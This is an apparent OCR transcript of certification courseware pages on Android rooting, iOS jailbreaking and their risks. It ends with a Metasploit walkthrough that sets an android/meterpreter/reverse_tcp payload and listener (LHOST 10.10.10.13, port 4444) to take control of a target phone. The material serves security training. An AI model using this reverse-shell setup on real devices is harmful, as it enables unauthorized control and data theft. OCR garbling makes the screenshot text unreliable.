Android Rooting and Jailbreaking (Exam 212-82)

Document Details

barrejamesteacher

Uploaded by barrejamesteacher

null

EC-Council

Tags

android rooting ios jailbreaking cybersecurity information security

Summary

This document details techniques for gaining unauthorized access to Android and iOS devices. It covers rooting and jailbreaking, including security risks. It discusses the methods for attaining privileged access on Android devices and bypassing user limitations on iOS devices.

Full Transcript

Certified Cybersecurity Technician Information Security Attacks Exam 212-82 Android Rooting O O P -3 l'l and=0I1D Rooting allows Android users to attain privileged control (known as "root access") within Android's subsystem Rooting process involves exploiting security vulnerabilities in the device f...

Certified Cybersecurity Technician Information Security Attacks Exam 212-82 Android Rooting O O P -3 l'l and=0I1D Rooting allows Android users to attain privileged control (known as "root access") within Android's subsystem Rooting process involves exploiting security vulnerabilities in the device firmware and copying the SU binary to a location in the current process's PATH (e.g., /system/xbin/su) and granting it executable permissions with the chmod command Rooting enables all user-installed applications to run privileged commands, such as » Modifying or deleting system files, module, ROMs (stock firmware), and kernels » Removing carrier- or manufacturer- installed applications (bloatware) > Low-level access to the hardware that are typically unavailable to the devices in their default configuration » Wi-Fi and Bluetooth tethering 7 Install applications on an SD card Copyright © by I L All Rights Reserved. Reproductionis Strictly Prohibited 1 Android Rooting The goal of rooting Android is to overcome the restrictions imposed by hardware manufacturers and carriers, thereby resulting in the ability to modify or replace system applications and settings, run apps that require admin privileges, remove and replace a device’s 0S, remove applications pre-installed by its manufacturer or carrier, or perform other operations that are otherwise inaccessible to the typical Android user. Rooting allows Android users to attain privileged control (known as “root access”) within Android’s subsystem. The rooting process involves exploiting security vulnerabilities in the device’s firmware, copying the su binary to a location in the current process’s PATH (e.g., /system/xbin/su), and granting it executable permissions with the chmod command. Rooting enables all the user-installed applications to run privileged commands such as = Modifying or deleting system files, modules, ROMs (stock firmware), and kernels = Removing carrier- or manufacturer-installed applications (bloatware) = Low-level access to hardware that is typically unavailable to devices in their default configuration = |Improved performance = Wi-Fi and Bluetooth tethering * |nstalling applications on SD card = Better user interface and keyboard Rooting also comes with many security risks and other risks to your device, including * Voiding your phone's warranty Module 02 Page 353 Certified Cybersecurity Technician Copyright © by EC-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Attacks = Poor performance = Malware infection = Exam 212-82 “Bricking” the device One can use tools such as KingoRoot, TunesGo devices. Module 02 Page 354 Root Android Tool, and so on to root Android Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Attacks Exam 212-82 Jailbreaking iOS Jailbreaking is defined as the process of installing a * modified set of kernel patches that allows users to 158 run third-party applications not signed by the OS vendor * Jailbreaking provides root access to the operating system and permits downloading of third-party applications, themes, and extensions on iOS devices * Jailbreaking removes sandbox restrictions, which enables malicious apps to access restricted mobile resources and information oK (= App Store 4 Copyright © by EC cil served. Reproduction is Strictly Prohibited. | | Jailbreaking iOS Jailbreaking is defined as the process of installing a modified set of kernel patches that allow users to run third-party applications not signed by the OS vendor. It is the process of bypassing the user limitations set by Apple, such as modifying the OS, attaining admin privileges, and installing unofficially approved apps via “side loading.” You can accomplish jailbreaking by simply modifying the iOS system kernels. One reason for jailbreaking iOS devices such as iPhone, iPad, and iPod Touch is to expand the feature set restricted by Apple and its App Store. Jailbreaking provides root access to the OS and permits downloading of third-party applications, themes, and extensions that are unavailable through the official Apple App Store. Jailbreaking also removes sandbox restrictions, allowing malicious apps to access restricted mobile resources and information. One can use tools such as Cydia, Yuxigon, Sileo, and so on to jailbreak iOS devices. Jailbreaking, including like rooting, comes with = Voiding your phone’s warranty = Poor performance = Malware infection = “Bricking” the device Module 02 Page 355 many security risks and other Hexxa Plus, ApricotiOS, risks to your device, Certified Cybersecurity Technician Copyright © by EC-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. merdned Lyoersecurity Technici an Information Security Attacks Exam 212-82 Hacking an Android Device Using Metasploit Terminal Help Attackers use various tools such as Metasploit to create binary payloads , which are sent to the target Andr oid device to gain control overit Hacking an Android Device Using Metasploit * Copyright © by EC-Council. Al Rights Reserved. Reproduction is Strictly Prohibit ed, Metasploit Source: https.//www.metasploit. com vulnerabilities, enumerate networ ks, execute attacks, and evade detection. Meterpreter is a Metasploit attack payload that provides an interactive shel l that can be used to explore target machines and exe cute code. Module 02 Page 356 Certified Cybersecurity Technici an Copyright © by EC-Council All Rights Reserved. Reproduction ic Stric Certified Cybersecurity Technician Information Security Attacks Exam 212-82 N File Parrot Terminal Edit View Search Terminal Help msf5 exploit( ) >|set payload android/meterpreter/reverse payload => android/meterpreter/reverse tcp msf5 exploit( LHOST => 10.10.10.13 msfS exploit( Module Name Payload options be options Current Setting ) >Ishow LHOST 10.10.10.13 options Required Description (android/meterpreter/reverse tcp): Setting LHOST 10.10.10.13 specified) LPORT 4444 Exploit >|set (exploit/multi/handler): Current Name ) tcp Required Description The listen address The listen port (an interface may target: Id Name 0 Wildcard Target Figure 2.69: Screenshot of Metasploit Module 02 Page 357 Certified Cybersecurity Technician Copyright © by EC-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited.

Use Quizgecko on...
Browser
Browser